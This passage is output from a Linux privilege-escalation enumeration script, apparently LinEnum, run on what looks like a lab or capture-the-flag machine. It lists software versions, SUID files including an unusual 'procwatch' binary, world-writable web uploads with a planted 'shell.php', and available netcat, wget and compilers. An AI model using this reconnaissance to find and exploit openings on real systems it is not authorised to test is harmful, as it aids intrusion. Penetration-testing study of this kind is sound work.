/lib/systemd/network:
total 12K
-rw-r--r-- 1 root root 368 May 27  2015 80-container-host0.network
-rw-r--r-- 1 root root 378 May 27  2015 80-container-ve.network
-rw-r--r-- 1 root root  73 May 27  2015 99-default.link

/lib/systemd/system-generators:
total 420K
-rwxr-xr-x 1 root root 50K May 27  2015 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 30K May 27  2015 systemd-debug-generator
-rwxr-xr-x 1 root root 26K May 27  2015 systemd-default-display-manager-generator
-rwxr-xr-x 1 root root 54K May 27  2015 systemd-fstab-generator
-rwxr-xr-x 1 root root 30K May 27  2015 systemd-getty-generator
-rwxr-xr-x 1 root root 70K May 27  2015 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 34K May 27  2015 systemd-insserv-generator
-rwxr-xr-x 1 root root 26K May 27  2015 systemd-rc-local-generator
-rwxr-xr-x 1 root root 26K May 27  2015 systemd-system-update-generator
-rwxr-xr-x 1 root root 54K May 27  2015 systemd-sysv-generator

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 872 May 27  2015 90-systemd.preset

/lib/systemd/system-shutdown:
total 0

/lib/systemd/system-sleep:
total 0


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.10p3


[-] MYSQL version:
mysql  Ver 14.14 Distrib 5.5.44, for debian-linux-gnu (i686) using readline 6.3


[-] Apache version:
Server version: Apache/2.4.10 (Debian)
Server built:   Mar 15 2015 10:44:30


[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


[-] Installed Apache modules:
Loaded Modules:
 core_module (static)
 so_module (static)
 watchdog_module (static)
 http_module (static)
 log_config_module (static)
 logio_module (static)
 version_module (static)
 unixd_module (static)
 access_compat_module (shared)
 alias_module (shared)
 auth_basic_module (shared)
 authn_core_module (shared)
 authn_file_module (shared)
 authz_core_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 filter_module (shared)
 mime_module (shared)
 mpm_prefork_module (shared)
 negotiation_module (shared)
 php5_module (shared)
 setenvif_module (shared)
 status_module (shared)


[-] www home dir contents:
/var/www/:
total 16K
drwxr-xr-x  4 root root 4.0K Aug  2  2015 .
drwxr-xr-x 12 root root 4.0K Aug  2  2015 ..
drwxrwxrwx  2 root root 4.0K Aug  2  2015 backup
drwxr-xr-x  4 root root 4.0K Aug  2  2015 html

/var/www/backup:
total 20K
drwxrwxrwx 2 root root 4.0K Aug  2  2015 .
drwxr-xr-x 4 root root 4.0K Aug  2  2015 ..
-rwsr-xr-x 1 root root 4.9K Aug  2  2015 procwatch
-rw-r--r-- 1 root root   28 Aug  2  2015 readme.txt

/var/www/html:
total 60K
drwxr-xr-x 4 root root 4.0K Aug  2  2015 .
drwxr-xr-x 4 root root 4.0K Aug  2  2015 ..
-rw-r--r-- 1 root root  196 Aug  2  2015 index.html
drwxr-xr-x 2 root root 4.0K Aug  2  2015 kzMb5nVYJw
-rw-r--r-- 1 root root  17K Aug  2  2015 main.gif
-rw-r--r-- 1 root root  17K May 24  2013 main.gif_original
drwxrwxrwx 2 root root 4.0K Nov 17 08:38 uploads

/var/www/html/kzMb5nVYJw:
total 16K
drwxr-xr-x 2 root root 4.0K Aug  2  2015 .
drwxr-xr-x 4 root root 4.0K Aug  2  2015 ..
-rw-r--r-- 1 root root  731 Aug  2  2015 420search.php
-rw-r--r-- 1 root root  495 Aug  2  2015 index.php

/var/www/html/uploads:
total 24K
drwxrwxrwx 2 root  root  4.0K Nov 17 08:38 .
drwxr-xr-x 4 root  root  4.0K Aug  2  2015 ..
-rw-rw-rw- 1 mysql mysql  453 Nov 17 07:17 file_upload.php
-rw-r--r-- 1 root  root   113 Aug  2  2015 index.html
-rw-rw-rw- 1 mysql mysql   19 Nov 17 07:31 phpinfo.php
-rw-rw-rw- 1 mysql mysql   75 Nov 17 08:38 shell.php


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc


[-] Installed compilers:
ii  g++                           4:4.9.2-2                    i386         GNU C++ compiler
ii  g++-4.9                       4.9.2-10                     i386         GNU C++ compiler
ii  gcc                           4:4.9.2-2                    i386         GNU C compiler
ii  gcc-4.9                       4.9.2-10                     i386         GNU C compiler
ii  libllvm3.5:i386               1:3.5-10                     i386         Modular compiler and toolchain technologies, runtime library


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1828 Aug  2  2015 /etc/passwd
-rw-r--r-- 1 root root 861 Aug  2  2015 /etc/group
-rw-r--r-- 1 root root 761 Oct 22  2014 /etc/profile
-rw-r----- 1 root shadow 1347 Aug  2  2015 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 562536 Mar 23  2015 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13796 Nov 28  2014 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 5372 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 9540 Apr 15  2015 /usr/lib/pt_chown
-rwsr-xr-- 1 root messagebus 362672 May 28  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root mail 96192 Feb 12  2015 /usr/bin/procmail
-rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 52344 Nov 20  2014 /usr/bin/chfn
-rwsr-xr-x 1 root root 38740 Nov 20  2014 /usr/bin/newgrp
-rwsr-xr-x 1 root root 43576 Nov 20  2014 /usr/bin/chsh
-rwsr-xr-x 1 root root 78072 Nov 20  2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18064 Nov 28  2014 /usr/bin/pkexec
-rwsr-xr-x 1 root root 53112 Nov 20  2014 /usr/bin/passwd
-rwsr-xr-x 1 root root 176400 Mar 12  2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 1081076 Feb 18  2015 /usr/sbin/exim4
-rwsr-xr-x 1 root root 4932 Aug  2  2015 /var/www/backup/procwatch
-rwsr-xr-x 1 root root 38868 Nov 20  2014 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 30  2015 /bin/mount
-rwsr-xr-x 1 root root 26344 Mar 30  2015 /bin/umount
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs


[-] SGID files:
-rwxr-sr-x 1 root utmp 4972 Feb 21  2011 /usr/lib/utempter/utempter
-rwxr-sr-x 1 root shadow 21964 Nov 20  2014 /usr/bin/expiry
-rwxr-sr-x 1 root tty 26240 Mar 30  2015 /usr/bin/wall
-rwxr-sr-x 1 root mail 9772 Dec  5  2014 /usr/bin/mutt_dotlock
-rwsr-sr-x 1 root mail 96192 Feb 12  2015 /usr/bin/procmail
-rwxr-sr-x 1 root mlocate 32116 Jun 13  2013 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 7052 Oct 25  2014 /usr/bin/mlock
-rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
-rwxr-sr-x 1 root ssh 419192 Mar 23  2015 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 9680 Oct 18  2014 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 17880 Feb 12  2015 /usr/bin/lockfile
-rwxr-sr-x 1 root mail 13892 Jun  2  2013 /usr/bin/dotlockfile
-rwxr-sr-x 1 root crontab 38844 Oct 26  2014 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 61232 Nov 20  2014 /usr/bin/chage
-rwxr-sr-x 1 root shadow 34424 Aug 26  2014 /sbin/unix_chkpwd


[+] Files with POSIX capabilities set:
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/bin/ping6 = cap_net_raw+ep
/bin/ping = cap_net_raw+ep


[+] Private SSH keys found!:
/home/ramses/LinEnum.sh


[+] AWS secret keys found!:
/home/ramses/LinEnum.sh


[-] World-writable files (excluding /proc and /sys):
-rw-rw-rw- 1 mysql mysql 453 Nov 17 07:17 /var/www/html/uploads/file_upload.php
-rw-rw-rw- 1 mysql mysql 19 Nov 17 07:31 /var/www/html/uploads/phpinfo.php
-rw-rw-rw- 1 mysql mysql 75 Nov 17 08:38 /var/www/html/uploads/shell.php


[-] NFS displaying partitions and filesystems - you need to check if exotic filesystems
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point>   <type>  <options>       <dump>  <pass>
# / was on /dev/sda1 during installation
UUID=ee9a6d62-e282-4ff0-a5bc-9bcb9bd6bfd2 /               ext4    errors=remount-ro 0       1
# swap was on /dev/sda5 during installation
UUID=91f44034-5a05-4253-948a-b0112f038ec1 none            swap    sw              0       0
/dev/sr0        /media/cdrom0   udf,iso9660 user,noauto     0       0


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 2969 Mar 19  2015 /etc/debconf.conf
-rw-r--r-- 1 root root 599 Feb 19  2009 /etc/logrotate.conf
-rw-r--r-- 1 root root 552 Aug  9  2014 /etc/pam.conf
-rw-r--r-- 1 root root 279 Jun 13  2013 /etc/updatedb.conf
-rw-r--r-- 1 root root 1260 May 27  2014 /etc/ucf.conf
-rw-r--r-- 1 root root 62 Nov 17 08:35 /etc/resolv.conf
-rw-r--r-- 1 root root 10344 May  8  2014 /etc/sensors3.conf
-rw-r--r-- 1 root root 7649 Aug  1  2015 /etc/pnm2ppa.conf
-rw-r--r-- 1 root root 604 May 16  2012 /etc/deluser.conf
-rw-r--r-- 1 root root 34 Jun 18  2014 /etc/ld.so.conf
-rw-r--r-- 1 root root 206 Aug 13  2014 /etc/idmapd.conf
-rw-r--r-- 1 root root 3173 Jan  4  2015 /etc/reportbug.conf
-rw-r--r-- 1 root root 529 Aug  1  2015 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2084 Mar  7  2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 2584 Feb  7  2014 /etc/gai.conf
-rw-r--r-- 1 root root 2632 Oct  2  2014 /etc/rsyslog.conf
-rw-r--r-- 1 root root 956 Feb 25  2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 2981 Aug  1  2015 /etc/adduser.conf
-rw-r--r-- 1 root root 859 Nov 24  2012 /etc/insserv.conf
-rw-r--r-- 1 root root 144 Aug  2  2015 /etc/kernel-img.conf
-rw-r--r-- 1 root root 346 Sep  2  2014 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 888 Aug 12  2014 /etc/usb_modeswitch.conf
-rw-r--r-- 1 root root 191 Sep  7  2014 /etc/libaudit.conf
-rw-r--r-- 1 root root 9 Aug  8  2006 /etc/host.conf
-rw-r--r-- 1 root root 7773 Aug  1  2015 /etc/ca-certificates.conf


[-] Location and contents (if accessible) of .bash_history file(s):
/home/eric/.bash_history
/home/ramses/.bash_history


[-] Any interesting mail in /var/mail:
total 2420
drwxrwsr-x  2 root mail    4096 Nov 17 08:41 .
drwxr-xr-x 12 root root    4096 Aug  2  2015 ..
-rw-rw----  1 bob  mail 2463137 Nov 17 08:41 bob


### SCAN COMPLETE ####################################

